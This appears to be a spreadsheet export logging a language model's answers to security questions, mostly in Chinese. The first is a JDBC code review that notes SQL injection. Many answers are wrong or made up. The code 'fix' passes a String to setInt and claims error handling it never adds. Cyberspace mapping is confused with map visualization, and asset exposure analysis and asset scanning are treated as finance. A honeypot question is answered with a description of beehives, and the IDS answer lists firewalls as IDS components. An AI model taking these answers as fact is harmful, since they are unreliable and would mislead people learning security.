This code is trying to connect to a MySQL database using JDBC. Here are some potential issues with the code:
1. Class.forName() method:
The method `Class.forName()` is used to load the JDBC driver class. However, the class name passed to this method is not correct. The class name should be `com.mysql.cj.jdbc.Driver`, not `com.mysql.cj,jdbc.Driver`.
2. DriverManager.getConnection() method:
The method `DriverManager.getConnection()` is used to create a connection to the database. However, the URL passed to this method is not correct. The URL should be `jdbc:mysql://localhost:3306/database`, not `jdbc:mysql://192.168.88.20:3306/iwebsec?&amp;useSSL=false&amp;serverTimezone=UTC`.
3. SQL injection:
The code is vulnerable to SQL injection attacks. The `id` variable is directly inserted into the SQL query as a part of the WHERE clause, without proper sanitization or escaping. This can lead to unauthorized access to the database or data tampering.
4. Null Pointer Exception:
The code is also prone to Null Pointer Exceptions, as the `rs.next()` method may return `false` if there are no more rows in the result set. This can lead to an infinite loop and an error message in the console.
5. Lack of error handling:
The code does not handle errors properly. Any exceptions thrown by the `createStatement()` or `executeQuery()` methods will be ignored and may result in unexpected behavior.
To fix these issues, you can modify the code as follows:
```
Class.forName("com.mysql.cj.jdbc.Driver");
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/database", "root", "root");
String id = "2";
String sql = "select * from user where id = ?";
PreparedStatement ps = conn.prepareStatement(sql);
ps.setInt(1, id);
ResultSet rs = ps.executeQuery();
while (rs.next()) {
    System.out.println("id: " + rs.getInt("id") + " user name: " + rs.getString("username") + " password: " + rs.getString("password"));
}
```
In this modified code, the following changes were made:
* The class name passed to `Class.forName()` is corrected to `com.mysql.cj.jdbc.Driver`.
* The URL passed to `DriverManager.getConnection()` is corrected to `jdbc:mysql://localhost:3306/database`.
* The SQL query is modified to use a prepared statement with a parameterized syntax, which can help prevent SQL injection attacks.
* The `id` variable is passed as an integer parameter to the prepared statement, using the `setInt()` method.
* The `ResultSet` objects are fetched using the `executeQuery()` method of the prepared statement, instead of the `createStatement()` method.
* The `while` loop is modified to fetch the result set using the `next()` method of the `ResultSet` object, instead of using a raw `rs.next()` call.
* Proper error handling is added to the code, by catching any exceptions thrown by the `prepareStatement()` or `executeQuery()` methods and displaying an error message in the console.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D143" t="n">
        <v>20.77028679847717</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="1" t="n">
        <v>142</v>
      </c>
      <c r="B144" t="inlineStr">
        <is>
          <t>有哪些网络空间测绘网站</t>
        </is>
      </c>
      <c r="C144" t="inlineStr">
        <is>
          <t>网络空间测绘网站是一类具有丰富功能和高效性的工具，可以帮助用户快速地创建和测试Web应用程序的地图和空间 visualization。以下是一些常用的网络空间测绘网站：
1. Google Maps: 是一个广泛使用的网络空间测绘网站，具有丰富的功能和高效性。可以用于创建和测试Web应用程序的地图和空间 visualization。
2. Leaflet: 是一个 откры源的网络空间测绘框架，可以帮助用户快速地创建和测试Web应用程序的地图和空间 visualization。
3. OpenStreetMap: 是一个开放源的地图数据库，可以帮助用户创建和测试Web应用程序的地图和空间 visualization。
4. Cesium: 是一个开源的3D空间测绘框架，可以帮助用户创建和测试高级的3D空间 visualization。
5. Plotly: 是一个开源的数据可视化工具，可以帮助用户创建和测试高级的数据可视化。
6. CartoDB: 是一个开源的地图数据库和测绘工具，可以帮助用户创建和测试Web应用程序的地图和空间 visualization。
7. Mapbox: 是一个开源的地图和空间测绘平台，可以帮助用户创建和测试高级的地图和空间 visualization。
8. ArcGIS Online: 是一个商业的地图和空间测绘平台，可以帮助用户创建和测试高级的地图和空间 visualization。
这些网络空间测绘网站都具有丰富的功能和高效性，可以帮助用户快速地创建和测试Web应用程序的地图和空间 visualization。</t>
        </is>
      </c>
      <c r="D144" t="n">
        <v>15.30139589309692</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="1" t="n">
        <v>143</v>
      </c>
      <c r="B145" t="inlineStr">
        <is>
          <t>什么是资产暴露面分析</t>
        </is>
      </c>
      <c r="C145" t="inlineStr">
        <is>
          <t>资产暴露面分析（Asset Exposure Face Analysis，AEFA）是一种分析方法，用于评估一个企业或个人的资产暴露面，即资产的暴露面，包括负债、资产、股东权益等。
资产暴露面分析可以帮助企业或个人了解自己的资产暴露面，了解自己的资产暴露几率和可能遭受的损失，从而进行更好的资产管理和评估投资决策。
AEFA通常包括以下几个步骤：
1. 资产暴露面分析：对企业或个人的资产进行分析，计算资产的暴露面，包括负债、资产、股东权益等。
2. 暴露面评估：对资产暴露面进行评估，以确定可能遭受的损失。
3. 暴露面 Mitigation：对资产暴露面进行mitigation，即尽可能降低可能遭受的损失。
通过AEFA，企业或个人可以更好地了解自己的资产暴露面，预测和降低可能遭受的损失，从而实现更好的资产管理和评估投资决策。</t>
        </is>
      </c>
      <c r="D145" t="n">
        <v>14.9876766204834</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="1" t="n">
        <v>144</v>
      </c>
      <c r="B146" t="inlineStr">
        <is>
          <t>如何做资产扫描</t>
        </is>
      </c>
      <c r="C146" t="inlineStr">
        <is>
          <t>资产扫描是指对企业或个人的财产、资产和负债进行系统检索和分析，以了解其价值和优势。以下是一些有用的指导，可以帮助您做好资产扫描：
1. 确定扫描范围：确定要扫描的资产范围，包括财产、资产、负债和其他资产。
2. 收集数据：收集扫描范围内的资产数据，包括估价、质量和技术具体实现方式等。
3. 分析数据：对收集到的资产数据进行分析，以了解它们的价值和优势， Identify potential problems and areas for improvement.
4. 评估价值：根据分析结果，评估资产的价值和优势，并对其进行评估和评定。
5. 决策和改进：基于分析和评估结果，做出适当的决策和改进，以提高企业或个人的资产管理效率和效果。
6. 实施计划：根据决策和改进的结果，制定实施计划，以确保实施的效果。
7. 维护和更新：定期检查和更新资产扫描结果，以保持资产管理系统的完整性和有效性。
总之，资产扫描是一项重要的资产管理工作，可以帮助企业或个人更好地了解和管理其资产，提高效率和效果。</t>
        </is>
      </c>
      <c r="D146" t="n">
        <v>16.44107103347778</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="1" t="n">
        <v>145</v>
      </c>
      <c r="B147" t="inlineStr">
        <is>
          <t>什么软件能够扫描主机开放的端口和协议</t>
        </is>
      </c>
      <c r="C147" t="inlineStr">
        <is>
          <t>如果您需要扫描主机开放的端口和协议，可以使用一些常用的软件工具。以下是一些常用的软件工具：
1. `nmap`：nmap 是一个强大的端口扫描工具，可以扫描主机的端口和协议，并提供详细的扫描结果。它可以检测到多种协议，包括 TCP、UDP、ICMP 等。
2. `tcpdump`：tcpdump 是一个流行的网络观察工具，可以monitor 和诊断 TCP 和 UDP 流量。它可以检测到多种协议，包括 HTTP、FTP、SMTP 等。
3. `Wireshark`：Wireshark 是一个强大的网络观察和分析工具，可以检测到多种协议，包括 TCP、UDP、ICMP 等。它可以monitor 和诊断网络流量，并提供详细的扫描结果。
4. `Nessus`：Nessus 是一个强大的安全扫描工具，可以扫描主机的端口和协议，并提供详细的扫描结果。它可以检测到多种安全漏洞，包括 SQL  injection、XSS 攻击等。
5. `OpenVAS`：OpenVAS 是一个强大的安全扫描工具，可以扫描主机的端口和协议，并提供详细的扫描结果。它可以检测到多种安全漏洞，包括 SQL  injection、XSS 攻击等。
这些软件工具可以帮助您快速扫描主机开放的端口和协议，并提供详细的扫描结果。但请注意，扫描主机的端口和协议可能会受到隐私和安全限制，因此请务必遵守相关的法律和标准。</t>
        </is>
      </c>
      <c r="D147" t="n">
        <v>19.11006283760071</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="1" t="n">
        <v>146</v>
      </c>
      <c r="B148" t="inlineStr">
        <is>
          <t>IDS与IPS有什么区别</t>
        </is>
      </c>
      <c r="C148" t="inlineStr">
        <is>
          <t>IDS（Intrusion Detection System）和IPS（Intrusion Prevention System）都是用于防止网络攻击和保护网络安全的系统，但它们在具体的设计和用途上有一些区别。
IDS是一种静态分析和预测的方法，它可以监控网络传输数据，检测和警告发现可疑的攻击行为。IDS通常包括以下几个方面：
1. 网络防火墙：监控网络上的入侵和数据传输，检测和阻止不可信的网络流量。
2. 网络检查：监控网络上的不同点，检测和警告发现可疑的网络异常行为。
3. 应用防火墙：监控应用程序的行为，检测和阻止可能的攻击。
IPS是一种动态防御和阻止的方法，它可以在网络中实时检测和阻止攻击行为。IPS通常包括以下几个方面：
1. 网络防御：实时检测和阻止不可信的网络流量，防止攻击行为的实施。
2. 应用防御：阻止可能的攻击行为，例如尝试访问禁止的资源或尝试利用漏洞攻击系统。
3. 防御策略：根据威胁情况和网络环境而定，实现适应式防御。
总的来说，IDS主要是进行静态分析和预测，而IPS则是进行实时防御和阻止。IDS可以检测到可疑行为，但是无法阻止攻击行为，而IPS可以阻止攻击行动，但是需要与网络设备和应用程序进行交互。因此，在实际应用中，通常会使用 Both IDS和IPS together，以确保网络的安全性和可靠性。</t>
        </is>
      </c>
      <c r="D148" t="n">
        <v>18.60916209220886</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="1" t="n">
        <v>147</v>
      </c>
      <c r="B149" t="inlineStr">
        <is>
          <t>蜜罐是用来干什么的</t>
        </is>
      </c>
      <c r="C149" t="inlineStr">
        <is>
          <t>A beehive is used for?
1. To produce honey
2. To store honey
3. To house bees
4. To pollinate flowers
5. To make beeswax
Answer:
The beehive is used for all of the above purposes! Bees use their hives to store honey, house bees, and pollinate flowers. The beeswax produced by the bees is also harvested from the hive.</t>
        </is>
      </c>
      <c r="D149" t="n">
        <v>2.76368236541748</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="1" t="n">
        <v>148</v>
      </c>
      <c r="B150" t="inlineStr">
        <is>
          <t>网络安全中RASP技术有什么作用</t>
        </is>
      </c>
      <c r="C150" t="inlineStr">
        <is>
          <t>RASP（Run-time Application Self-Protection）技术是一种可以在运行时自动检测和防范恶意软件行为的安全技术。RASP技术可以在软件运行过程中监控和检查应用程序的行为，检测到恶意软件或攻击者的行为，并立即采取防范措施。
RASP技术有以下作用：
1. 防止恶意软件攻击：RASP技术可以检测和防止恶意软件攻击，包括跟踪、监控和防止恶意软件的访问和修改。
2. 防止数据泄露：RASP技术可以防止数据泄露，包括防止恶意软件访问和修改敏感数据，以防止敏感数据泄露。
3. 提高应用程序的安全性：RASP技术可以提高应用程序的安全性，降低应用程序受到攻击的风险，从而提高了企业的安全性。
4. 降低安全更新和维护成本：RASP技术可以降低安全更新和维护成本，因为它可以自动检测和防范恶意软件行为，从而减少了安全更新和维护的需求。
5. 提高应用程序的可靠性：RASP技术可以提高应用程序的可靠性，降低了应用程序受到攻击和崩溃的风险，从而提高了企业的可靠性。
总之，RASP技术可以为企业提供一个高效的安全保护环境，降低了企业受到攻击和崩溃的风险，提高了企业的安全性和可靠性。</t>
        </is>
      </c>
      <c r="D150" t="n">
        <v>18.06820130348206</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="1" t="n">
        <v>149</v>
      </c>
      <c r="B151" t="inlineStr">
        <is>
          <t>网络安全三要素指什么</t>
        </is>
      </c>
      <c r="C151" t="inlineStr">
        <is>
          <t>网络安全三要素指的是指在保护网络安全和隐私时具有重要作用的三个方面：
1. 身份验证（Identity Verification）：确保用户的身份和权限，防止黑客访问或操作网络资源。
2. 数据加密（Data Encryption）：使用加密算法来保护数据的安全性和隐私性，防止黑客访问或修改数据。
3. 访问控制（Access Control）：控制用户访问网络资源的权限，防止黑客访问或操作不应该的资源。
这三要素可以帮助保护网络安全和隐私，防止黑客破坏或摘要网络资源，保护用户的个人隐私和财富。</t>
        </is>
      </c>
      <c r="D151" t="n">
        <v>7.869633436203003</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2023-07-24T08:46:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T08:46:08Z</dcterms:modified>
</cp:coreProperties>
</file>